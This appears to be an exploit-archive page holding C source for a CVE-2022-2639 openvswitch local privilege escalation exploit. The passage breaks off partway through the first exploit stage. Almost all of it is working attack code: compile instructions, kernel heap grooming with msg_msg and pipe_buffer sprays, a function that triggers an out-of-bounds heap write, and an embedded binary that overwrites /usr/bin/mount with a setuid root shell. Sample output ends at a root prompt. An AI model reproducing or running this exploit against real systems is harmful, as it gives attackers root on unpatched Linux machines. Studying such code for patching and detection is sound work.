4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.c C
/**
 * CVE-2022-2639 openvswitch LPE exploit
 *
 * This exploit use pipe-primitive so no kaslr leak nor smap
 *  smep ktpi bypass is needed.
 *
 * Compile with:
 *  gcc exploit.c -o exploit -static -no-pie -s
 *
 * This exploit will overwrite /usr/bin/mount with suid-shell and
 *  execute it. BACKUP IT MANUALLY before running exploit, and
 *  RESTORE it quickly after exploit success.
 *
 * / $ ./exploit
 * [*] exploit.c:1183 initialize exploit environment ...
 * [+] exploit.c:630 get dp_family_id = 33
 * [+] exploit.c:637 get flow_family_id = 35
 * [*] exploit.c:1186 create br to check if openvswitch works ...
 * [*] exploit.c:781 br1337 ifindex: 7
 * [*] exploit.c:1189 do exploit step 1 ...
 * [*] exploit.c:880 do heap fengshui to reduce noise ...
 * [*] exploit.c:896 sparying msg_msg ...
 * [*] exploit.c:907 free other rx_ring buffer ...
 * [*] exploit.c:915 trigger vuln to do heap oob write ...
 * [*] exploit.c:925 search corrupted msg_msg ...
 * [+] exploit.c:932 corrupted msg_msg found, id: 52
 * [*] exploit.c:949 clean unused msg_msg ...
 * [*] exploit.c:953 alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...
 * [*] exploit.c:979 it works :)
 * [+] exploit.c:993 leak list2_leak_msqid: 1029
 * [+] exploit.c:994 leak list2_leak_mtype: 0x942
 * [+] exploit.c:995 leak list2_uaf_msg_addr: 0xffff888007676400
 * [+] exploit.c:996 leak list2_uaf_mtype: 0x842
 * [*] exploit.c:1000 clean unused msg_msg ...
 * [*] exploit.c:1194 do exploit step 2 ...
 * [*] exploit.c:1009 do heap fengshui to reduce noise ...
 * [*] exploit.c:1025 sparying msg_msg ...
 * [*] exploit.c:1036 free other rx_ring buffer ...
 * [*] exploit.c:1044 trigger vuln to do heap oob write ...
 * [*] exploit.c:1051 free uaf msg_msg from correct msqid
 * [*] exploit.c:1057 spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg
 * [*] exploit.c:1071 free skbuff_data using fake msqid
 * [*] exploit.c:1074 freed using msqid 104
 * [*] exploit.c:1080 spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data
 * [*] exploit.c:1099 free skbuff_data to make pipe_buffer become UAF
 * [+] exploit.c:1115 uaf_pipe_idx: 2
 * [*] exploit.c:1126 edit pipe_buffer->flags
 * [*] exploit.c:1138 try to overwrite /usr/bin/mount
 * [*] exploit.c:1149 see if /usr/bin/mount changed
 * [+] exploit.c:1163 exploit success
 * [*] exploit.c:1199 maybe unsafe to exit, sleep infinitely ...
 * / # id
 * uid=0(root) gid=0(root) groups=1000(ctf)
 *
 */

#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/genetlink.h>
#include <linux/if_packet.h>
#include <linux/netlink.h>
#include <linux/openvswitch.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <unistd.h>

#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_DEFAULT "\033[0m"

#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
#define logi(fmt, ...) dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define logw(fmt, ...) dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define loge(fmt, ...) dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define die(fmt, ...)                      \
    do {                                   \
        loge(fmt, ##__VA_ARGS__);          \
        loge("Exit at line %d", __LINE__); \
        write(sync_pipe[1], "F", 1);       \
        exit(1);                           \
    } while (0)

#define ELEM_CNT(x) (sizeof(x) / sizeof(x[0]))

struct ovs_attr {
    uint16_t type;
    void *data;
    uint16_t len;
};

#define GENLMSG_DATA(glh) ((void *)(((char *)glh) + GENL_HDRLEN))
#define NLA_DATA(nla) ((void *)((char *)(nla) + NLA_HDRLEN))
#define NLA_NEXT(nla, len) ((len) -= NLA_ALIGN((nla)->nla_len), \
                            (struct nlattr *)(((char *)(nla)) + NLA_ALIGN((nla)->nla_len)))
#define NLA_OK(nla, len) ((len) >= (int)sizeof(struct nlattr) &&     \
                          (nla)->nla_len >= sizeof(struct nlattr) && \
                          (nla)->nla_len <= (len))

int nla_attr_size(int payload) {
    return NLA_HDRLEN + payload;
}

int nla_total_size(int payload) {
    return NLA_ALIGN(nla_attr_size(payload));
}

int genlmsg_open(void) {
    int sockfd;
    struct sockaddr_nl nladdr;
    int ret;

    sockfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
    if (sockfd < 0) {
        loge("socket: %m");
        return -1;
    }

    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;
    nladdr.nl_pid = getpid();
    // nladdr.nl_groups = 0xffffffff;

    ret = bind(sockfd, (struct sockaddr *)&nladdr, sizeof(nladdr));
    if (ret < 0) {
        loge("bind: %m");
        close(sockfd);
        return -1;
    }

    return sockfd;
}

void *genlmsg_alloc(int *size) {
    unsigned char *buf;
    int len;

    /*
     * attribute len
     * attr len = (nla_hdr + pad) + (payload(user data) + pad)
     */
    len = nla_total_size(*size);
    /*
     * family msg len,
     * but actually we have NOT custom family header
     * family msg len = family_hdr + payload(attribute)
     */
    len += 0;
    /*
     * generic netlink msg len
     * genlmsg len = (genlhdr + pad) + payload(family msg)
     */
    len += GENL_HDRLEN;
    /*
     * netlink msg len
     * nlmsg len = (nlmsghdr + pad) + (payload(genlmsg) + pad)
     */
    len = NLMSG_SPACE(len);

    buf = malloc(len);
    if (!buf)
        return NULL;

    memset(buf, 0, len);
    *size = len;

    return buf;
}

void genlmsg_free(void *buf) {
    if (buf) {
        free(buf);
    }
}

int genlmsg_send(int sockfd, unsigned short nlmsg_type, unsigned int nlmsg_pid,
                 unsigned char genl_cmd, unsigned char genl_version,
                 unsigned short nla_type, const void *nla_data, unsigned int nla_len) {
    struct nlmsghdr *nlh;   // netlink message header
    struct genlmsghdr *glh; // generic netlink message header
    struct nlattr *nla;     // netlink attribute header

    struct sockaddr_nl nladdr;
    unsigned char *buf;
    int len;

    int count;
    int ret;

    if ((nlmsg_type == 0) || (!nla_data) || (nla_len <= 0)) {
        return -1;
    }

    len = nla_len;
    buf = genlmsg_alloc(&len);
    if (!buf)
        return -1;

    nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_len = len;
    nlh->nlmsg_type = nlmsg_type;
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = nlmsg_pid;

    glh = (struct genlmsghdr *)NLMSG_DATA(nlh);
    glh->cmd = genl_cmd;
    glh->version = genl_version;

    nla = (struct nlattr *)GENLMSG_DATA(glh);
    nla->nla_type = nla_type;
    nla->nla_len = nla_attr_size(nla_len);
    memcpy(NLA_DATA(nla), nla_data, nla_len);

    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;

    count = 0;
    ret = 0;
    do {
        ret = sendto(sockfd, &buf[count], len - count, 0,
                     (struct sockaddr *)&nladdr, sizeof(nladdr));
        if (ret < 0) {
            if (errno != EAGAIN) {
                count = -1;
                goto out;
            }
        } else {
            count += ret;
        }
    } while (count < len);

out:
    genlmsg_free(buf);
    return count;
}

int genlmsg_recv(int sockfd, unsigned char *buf, unsigned int len) {
    struct sockaddr_nl nladdr;
    struct msghdr msg;
    struct iovec iov;

    int ret;

    nladdr.nl_family = AF_NETLINK;
    nladdr.nl_pid = getpid();
    // nladdr.nl_groups = 0xffffffff;

    iov.iov_base = buf;
    iov.iov_len = len;

    msg.msg_name = (void *)&nladdr;
    msg.msg_namelen = sizeof(nladdr);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = NULL;
    msg.msg_controllen = 0;
    msg.msg_flags = 0;
    ret = recvmsg(sockfd, &msg, 0);
    ret = ret > 0 ? ret : -1;
    return ret;
}

int genlmsg_dispatch(struct nlmsghdr *nlmsghdr, unsigned int nlh_len,
                     int nlmsg_type, int nla_type, unsigned char *buf, int *len) {
    struct nlmsghdr *nlh;
    struct genlmsghdr *glh;
    struct nlattr *nla;
    int nla_len;

    int l;
    int i;
    int ret = -1;

    if (!nlmsghdr || !buf || !len)
        return -1;

    if (nlmsg_type && (nlmsghdr->nlmsg_type != nlmsg_type)) {
        return -1;
    }

    for (nlh = nlmsghdr; NLMSG_OK(nlh, nlh_len); nlh = NLMSG_NEXT(nlh, nlh_len)) {
        /* The end of multipart message. */
        if (nlh->nlmsg_type == NLMSG_DONE) {
            // printf("get NLMSG_DONE\n");
            ret = 0;
            break;
        }

        if (nlh->nlmsg_type == NLMSG_ERROR) {
            // printf("get NLMSG_ERROR\n");
            ret = -1;
            break;
        }

        glh = (struct genlmsghdr *)NLMSG_DATA(nlh);
        nla = (struct nlattr *)GENLMSG_DATA(glh); // the first attribute
        nla_len = nlh->nlmsg_len - GENL_HDRLEN;   // len of attributes
        for (i = 0; NLA_OK(nla, nla_len); nla = NLA_NEXT(nla, nla_len), ++i) {
            /* Match the family ID, copy the data to user */
            if (nla_type == nla->nla_type) {
                l = nla->nla_len - NLA_HDRLEN;
                *len = *len > l ? l : *len;
                memcpy(buf, NLA_DATA(nla), *len);
                ret = 0;
                break;
            }
        }
    }

    return ret;
}

int genlmsg_get_family_id(int sockfd, const char *family_name) {
    void *buf;
    int len;
    __u16 id;
    int l;
    int ret;

    ret = genlmsg_send(sockfd, GENL_ID_CTRL, 0, CTRL_CMD_GETFAMILY, 1,
                       CTRL_ATTR_FAMILY_NAME, family_name, strlen(family_name) + 1);
    if (ret < 0)
        return -1;

    len = 256;
    buf = genlmsg_alloc(&len);
    if (!buf)
        return -1;

    len = genlmsg_recv(sockfd, buf, len);
    if (len < 0)
        return len;

    id = 0;
    l = sizeof(id);
    genlmsg_dispatch((struct nlmsghdr *)buf, len, 0, CTRL_ATTR_FAMILY_ID, (unsigned char *)&id, &l);

    genlmsg_free(buf);

    return id > 0 ? id : -1;
}

void genlmsg_close(int sockfd) {
    if (sockfd >= 0) {
        close(sockfd);
    }
}

int ovsmsg_send(int sockfd, uint16_t nlmsg_type, uint32_t nlmsg_pid,
                uint8_t genl_cmd, uint8_t genl_version,
                int dp_ifindex, struct ovs_attr *ovs_attrs, int attr_num) {
    struct nlmsghdr *nlh;   // netlink message header
    struct genlmsghdr *glh; // generic netlink message header
    struct nlattr *nla;     // netlink attribute header
    struct ovs_header *ovh; // ovs user header

    struct sockaddr_nl nladdr;
    unsigned char *buf;
    int len = 0;

    int count;
    int ret;

    for (int i = 0; i < attr_num; i++) {
        len += nla_total_size(ovs_attrs[i].len);
    }

    buf = genlmsg_alloc(&len);
    if (!buf) {
        return -1;
    }

    nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_len = len;
    nlh->nlmsg_type = nlmsg_type;
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = nlmsg_pid;

    glh = (struct genlmsghdr *)NLMSG_DATA(nlh);
    glh->cmd = genl_cmd;
    glh->version = genl_version;

    ovh = (struct ovs_header *)GENLMSG_DATA(glh);
    ovh->dp_ifindex = dp_ifindex;
    char *offset = GENLMSG_DATA(glh) + 4;
    for (int i = 0; i < attr_num; i++) {
        nla = (struct nlattr *)(offset);
        nla->nla_type = ovs_attrs[i].type;
        nla->nla_len = nla_attr_size(ovs_attrs[i].len);
        memcpy(NLA_DATA(nla), ovs_attrs[i].data, ovs_attrs[i].len);
        offset += nla_total_size(ovs_attrs[i].len);
    }
    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;

    count = 0;
    ret = 0;
    do {
        ret = sendto(sockfd, &buf[count], len - count, 0,
                     (struct sockaddr *)&nladdr, sizeof(nladdr));
        if (ret < 0) {
            if (errno != EAGAIN) {
                count = -1;
                goto out;
            }
        } else {
            count += ret;
        }
    } while (count < len);

out:
    genlmsg_free(buf);
    return count;
}

#define ATTACK_FILE "/usr/bin/mount"
const char attack_data[] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00,
    0x00, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00,
    0x03, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xe8, 0x00, 0x00, 0x00, 0x00, 0x58, 0xeb, 0x48,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,
    0x01, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x57, 0x54, 0x59, 0x48, 0x33, 0x39, 0x59, 0x6a,
    0x6f, 0x54, 0x59, 0x66, 0x69, 0x39, 0x70, 0x59,
    0x57, 0x5a, 0x6a, 0x4a, 0x54, 0x59, 0x66, 0x69,
    0x39, 0x70, 0x30, 0x30, 0x74, 0x38, 0x30, 0x30,
    0x54, 0x38, 0x55, 0x30, 0x54, 0x38, 0x56, 0x6a,
    0x42, 0x54, 0x59, 0x66, 0x69, 0x39, 0x38, 0x59,
    0x30, 0x74, 0x38, 0x30, 0x30, 0x54, 0x38, 0x4b,
    0x48, 0x63, 0x31, 0x6a, 0x73, 0x54, 0x59, 0x66,
    0x69, 0x31, 0x36, 0x78, 0x4c, 0x4a, 0x74, 0x30,
    0x49, 0x6a, 0x52, 0x54, 0x59, 0x66, 0x69, 0x31,
    0x45, 0x6d, 0x56, 0x59, 0x49, 0x4a, 0x34, 0x4e,
    0x56, 0x54, 0x58, 0x41, 0x6b, 0x76, 0x32, 0x31,
    0x42, 0x32, 0x74, 0x31, 0x31, 0x41, 0x30, 0x76,
    0x31, 0x49, 0x6f, 0x56, 0x4c, 0x39, 0x30, 0x75,
    0x7a, 0x64, 0x54, 0x58, 0x73, 0x78, 0x30, 0x42,
    0x41, 0x31, 0x73, 0x6a, 0x7a, 0x36, 0x64, 0x75,
    0x54, 0x6f, 0x41, 0x37, 0x7a, 0x4b, 0x35, 0x70,
    0x79, 0x31, 0x72, 0x41, 0x73, 0x6a, 0x59, 0x79,
    0x64, 0x59, 0x55, 0x6a, 0x36, 0x35, 0x46, 0x65,
    0x59, 0x6e, 0x6e, 0x56, 0x4b, 0x50, 0x30, 0x6e,
    0x45, 0x59, 0x50, 0x6e, 0x36, 0x50, 0x39, 0x63,
    0x70, 0x37, 0x6d, 0x4a, 0x4b, 0x62, 0x79, 0x68,
    0x4b, 0x63, 0x52, 0x4f, 0x7a, 0x64, 0x75, 0x4f,
    0x4d, 0x33, 0x4c, 0x7a, 0x36, 0x38, 0x66};

#ifndef PAGE_SIZE
#define PAGE_SIZE (0x1000)
#endif
#define NUM_MSQIDS_1 (0x400)
#define NUM_MSQIDS_2 (0x400)
#define HOLE_STEP (0x100)
#define MSG_TEXT_SIZE(x) (         \
    (x) - sizeof(struct msg_msg) - \
    sizeof(struct msg_msgseg) * (((x + PAGE_SIZE - 1) / PAGE_SIZE) - 1))
#define MSG_A_RAW_SIZE (0x1400)
#define MSG_B_RAW_SIZE (0x400)
#define MSG_A_TEXT_SIZE MSG_TEXT_SIZE(MSG_A_RAW_SIZE)
#define MSG_B_TEXT_SIZE MSG_TEXT_SIZE(MSG_B_RAW_SIZE)
#define MTYPE_A (0x41)
#define MTYPE_B (0x42)
#define MTYPE_FAKE (0x43)
#define MSG_SIG (0x13371337)
#define NUM_SOCKETS (4)
#define NUM_SKBUFFS (0x20)
#define SIZE_OF_SKB_SHARED_INFO (0x140)
#define NUM_PIPES (0x100)
#define fengshui_skfd_cnt (0x20)

struct list_head {
    uint64_t next;
    uint64_t prev;
};

struct msg_msg {
    struct list_head m_list;
    uint64_t m_type;
    uint64_t m_ts;
    uint64_t next;
    uint64_t security;
    char mtext[0];
};

struct msg_msgseg {
    uint64_t next;
};

struct typ_msg {
    long mtype;
    char mtext[0];
};

struct typ_pipe_buffer {
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t padding1;
    uint64_t private;
};

int sync_pipe[2];

int sock_pairs[NUM_SOCKETS][2];
int pipes[NUM_PIPES][2];

char msg_buffer[0x4000] = {0};
struct typ_msg *msg = (struct typ_msg *)msg_buffer;
int msqid_1[NUM_MSQIDS_1];
int msqid_2[NUM_MSQIDS_2];
struct typ_msg *msg_a = (struct typ_msg *)msg_buffer;
struct typ_msg *msg_a_oob = (struct typ_msg *)msg_buffer;
struct typ_msg *msg_b = (struct typ_msg *)msg_buffer;
int list1_corrupted_msqid = -1;
int list2_leak_msqid = -1;
int list2_leak_mtype = 0;
uint64_t list2_uaf_msg_addr = 0;
uint64_t list2_leak_security = 0;
int list2_uaf_mtype = 0;
uint64_t heap_buffer_addr = 0;

int nl_sockfd = -1;
int dp_family_id = 1;
int flow_family_id = -1;

void hexdump(const void *data, size_t size) {
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i) {
        dprintf(2, "%02X ", ((unsigned char *)data)[i]);
        if (((unsigned char *)data)[i] >= ' ' && ((unsigned char *)data)[i] <= '~') {
            ascii[i % 16] = ((unsigned char *)data)[i];
        } else {
            ascii[i % 16] = '.';
        }
        if ((i + 1) % 8 == 0 || i + 1 == size) {
            dprintf(2, " ");
            if ((i + 1) % 16 == 0) {
                dprintf(2, "|  %s \n", ascii);
            } else if (i + 1 == size) {
                ascii[(i + 1) % 16] = '\0';
                if ((i + 1) % 16 <= 8) {
                    dprintf(2, " ");
                }
                for (j = (i + 1) % 16; j < 16; ++j) {
                    dprintf(2, "   ");
                }
                dprintf(2, "|  %s \n", ascii);
            }
        }
    }
}

void init_unshare() {
    int fd;
    char buff[0x100];

    // strace from `unshare -Ur xxx`
    if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
        die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
    }

    if (unshare(CLONE_NEWNET)) {
        die("unshare(CLONE_NEWNET): %m");
    }

    fd = open("/proc/self/setgroups", O_WRONLY);
    snprintf(buff, sizeof(buff), "deny");
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", getuid());
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", getgid());
    write(fd, buff, strlen(buff));
    close(fd);
}

void bind_cpu() {
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(0, &my_set);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set)) {
        die("sched_setaffinity: %m");
    }
}

void init_nl_sock() {
    nl_sockfd = genlmsg_open();
    if (nl_sockfd < 0) {
        die("open sock failed");
    }

    dp_family_id = genlmsg_get_family_id(nl_sockfd, OVS_DATAPATH_FAMILY);
    if (dp_family_id < 0) {
        die("get dp_family_id failed");
    } else {
        logi("get dp_family_id = %d", dp_family_id);
    }

    flow_family_id = genlmsg_get_family_id(nl_sockfd, OVS_FLOW_FAMILY);
    if (flow_family_id < 0) {
        die("get flow_family_id failed");
    } else {
        logi("get flow_family_id = %d", flow_family_id);
    }

    if (dp_family_id == flow_family_id) {
        // like some bug, but I don't know how to solve it :(
        logw("id are same, retry ...");
        genlmsg_close(nl_sockfd);
        init_nl_sock();
    }
}

void init_msq() {
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        if (msqid_1[i] < 0) {
            die("msgget() fail");
        }
    }
    for (int i = 0; i < NUM_MSQIDS_2; i++) {
        msqid_2[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        if (msqid_2[i] < 0) {
            die("msgget() fail");
        }
    }
}

void init_sock() {
    for (int i = 0; i < NUM_SOCKETS; i++) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock_pairs[i]) < 0) {
            die("socketpair(): %m");
        }
    }
}

void do_init() {
    bind_cpu();
    init_unshare();
    init_nl_sock();
    init_msq();
    init_sock();
}

void clean_msq_1() {
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        msgrcv(msqid_1[i], msg_a, MSG_A_TEXT_SIZE, MTYPE_A, IPC_NOWAIT);
    }
}

void clean_msq_2() {
    for (int i = 0; i < NUM_MSQIDS_2; i++) {
        for (int j = 0; j < 0x10; j++) {
            msgrcv(msqid_2[i], msg_b, MSG_B_TEXT_SIZE, MTYPE_B | (j << 8), IPC_NOWAIT);
        }
    }
}

void spray_skbuff_data(void *ptr, size_t size) {
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (write(sock_pairs[i][0], ptr, size) < 0) {
                die("write to sock pairs failed");
            }
        }
    }
}

void free_skbuff_data(void *ptr, size_t size) {
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (read(sock_pairs[i][1], ptr, size) < 0) {
                die("read from sock pairs failed");
            }
        }
    }
}

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (rv < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        die("socket(AF_PACKET): %m");
    }

    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
                               sizeof_priv, timeout);

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0) {
        die("bind(AF_PACKET): %m");
    }

    return s;
}

int pagealloc_pad(int count, int size) {
    return packet_socket_setup(size, 2048, count, 0, 100);
}

void create_br1337() {
    struct ovs_attr ovs_attrs[] = {
        {OVS_DP_ATTR_NAME, "br1337", 7},
        {OVS_DP_ATTR_UPCALL_PID, "aaa", 4},
    };
    ovsmsg_send(nl_sockfd, dp_family_id, 0, OVS_DP_CMD_NEW, OVS_DATAPATH_VERSION, 1, ovs_attrs, ELEM_CNT(ovs_attrs));
    int ifindex = if_nametoindex("br1337");
    if (!ifindex) {
        logw("create br1337 failed: %m");
        logw("maybe openvswitch module not enabled in kernel?");
        logw("further exploitation may fail");
    } else {
        logd("br1337 ifindex: %d", ifindex);
    }
}

void trigger_vuln(void *vuln_data, size_t vuln_size) {
    struct nlattr *key_nla;

    struct ovs_key_ethernet eth_key;
    memcpy(eth_key.eth_src, "\x01\x02\x03\x04\x05", 6);
    memcpy(eth_key.eth_dst, "\x05\x04\x03\x02\x01", 6);

    struct ovs_key_ipv4 ipv4_key = {
        .ipv4_src = 0x12345678,
        .ipv4_dst = 0x87654321,
        .ipv4_proto = 1,
        .ipv4_tos = 1,
        .ipv4_ttl = 1,
        .ipv4_frag = 2,
    };

    struct ovs_attr key_attrs[] = {
        {OVS_KEY_ATTR_ETHERNET, &eth_key, sizeof(struct ovs_key_ethernet)},
        {OVS_KEY_ATTR_ETHERTYPE, "\x08\x00", 2},
        {OVS_KEY_ATTR_IPV4, &ipv4_key, sizeof(struct ovs_key_ipv4)},
    };

    int key_size = 0;
    for (int i = 0; i < ELEM_CNT(key_attrs); i++) {
        key_size += nla_total_size(key_attrs[i].len);
    }

    key_nla = (struct nlattr *)malloc(key_size);
    void *key_offset = key_nla;
    for (int i = 0; i < ELEM_CNT(key_attrs); i++) {
        struct nlattr *nla = key_offset;
        nla->nla_type = key_attrs[i].type;
        nla->nla_len = nla_attr_size(key_attrs[i].len);
        memcpy(NLA_DATA(nla), key_attrs[i].data, key_attrs[i].len);
        key_offset += nla_total_size(key_attrs[i].len);
    }

    char *action_nla = (char *)malloc(0x10000);
    if (!action_nla) {
        die("malloc: %m");
    }

    // 0x14 -> 0x20 (+0xc)
    const int ori_size = 0x14;
    const int rewrite_size = 0x1c;
    const int header_size = 0x1c;

    int pad_action_cnt = (0xfc00 - header_size) / (4 + rewrite_size);

    int i = 0;
    for (i = 0; i < pad_action_cnt; i++) {
        struct nlattr *ptr = (struct nlattr *)(action_nla + i * ori_size);
        ptr->nla_len = ori_size;
        ptr->nla_type = OVS_ACTION_ATTR_SET;

        ptr = NLA_DATA(ptr);
        ptr->nla_len = 0x10;
        ptr->nla_type = OVS_KEY_ATTR_ETHERNET;

        ptr = NLA_DATA(ptr);
        memset(ptr, 'k', 0xc);
    }

    const uint32_t padding_size = 0x10000 - (header_size + (4 + rewrite_size) * pad_action_cnt);
    uint16_t evil_size = padding_size + vuln_size;
    {
        struct nlattr *ptr = (struct nlattr *)(action_nla + i * ori_size);
        ptr->nla_len = evil_size;
        ptr->nla_type = OVS_ACTION_ATTR_USERSPACE;

        // sub attr1
        struct nlattr *sub_ptr = NLA_DATA(ptr);
        sub_ptr->nla_len = 8;
        sub_ptr->nla_type = OVS_USERSPACE_ATTR_PID;
        char *sub_buff = NLA_DATA(sub_ptr);
        memset(sub_buff, 'A', 4);

        char *padding_ptr = ((char *)sub_ptr) + NLA_ALIGN(sub_ptr->nla_len);
        memset(padding_ptr, 'x', padding_size - (padding_ptr - (char *)ptr));

        memcpy((char *)action_nla + i * ori_size + padding_size, vuln_data, vuln_size);
    }

    struct ovs_attr ovs_attrs[] = {
        {OVS_FLOW_ATTR_KEY, key_nla, key_size},
        {OVS_FLOW_ATTR_ACTIONS, action_nla, nla_total_size(0xff00)},
    };

    ovsmsg_send(nl_sockfd, flow_family_id, 0, OVS_FLOW_CMD_NEW, OVS_FLOW_VERSION,
                0, ovs_attrs, ELEM_CNT(ovs_attrs));
}

int exploit_step1() {
    char buff[0x1000];

    logd("do heap fengshui to reduce noise ...");
    pagealloc_pad(1000, 0x1000);
    pagealloc_pad(500, 0x2000);
    pagealloc_pad(200, 0x4000);
    pagealloc_pad(200, 0x8000);
    pagealloc_pad(100, 0x10000);
    int fengshui_skfd[fengshui_skfd_cnt];
    for (int i = 0; i < fengshui_skfd_cnt; i++) {
        fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
    }
    for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
        close(fengshui_skfd[i]);
        fengshui_skfd[i] = -1;
    }

    // spray msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
    logd("sparying msg_msg ...");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        msg_a->mtype = MTYPE_A;
        memset(msg_a->mtext, 'Q', MSG_A_TEXT_SIZE);
        ((int *)msg_a->mtext)[0] = MSG_SIG;
        ((int *)msg_a->mtext)[1] = i;
        if (msgsnd(msqid_1[i], msg_a, MSG_A_TEXT_SIZE, 0) < 0) {
            die("msgsnd(): %m");
        }
    }

    logd("free other rx_ring buffer ... ");
    for (int i = 0; i < fengshui_skfd_cnt; i++) {
        if (fengshui_skfd[i] > 0) {
            close(fengshui_skfd[i]);
            fengshui_skfd[i] = -1;
        }
    }

    logd("trigger vuln to do heap oob write ...");
    uint64_t vuln_buf[] = {
        0,                                     // m_list.next
        0,                                     // m_list.prev
        MTYPE_A,                               // m_type
        MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400), // m_ts
    };
    trigger_vuln(&vuln_buf, sizeof(vuln_buf));

    // recv from buffer to see if leak success
    logd("search corrupted msg_msg ...");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
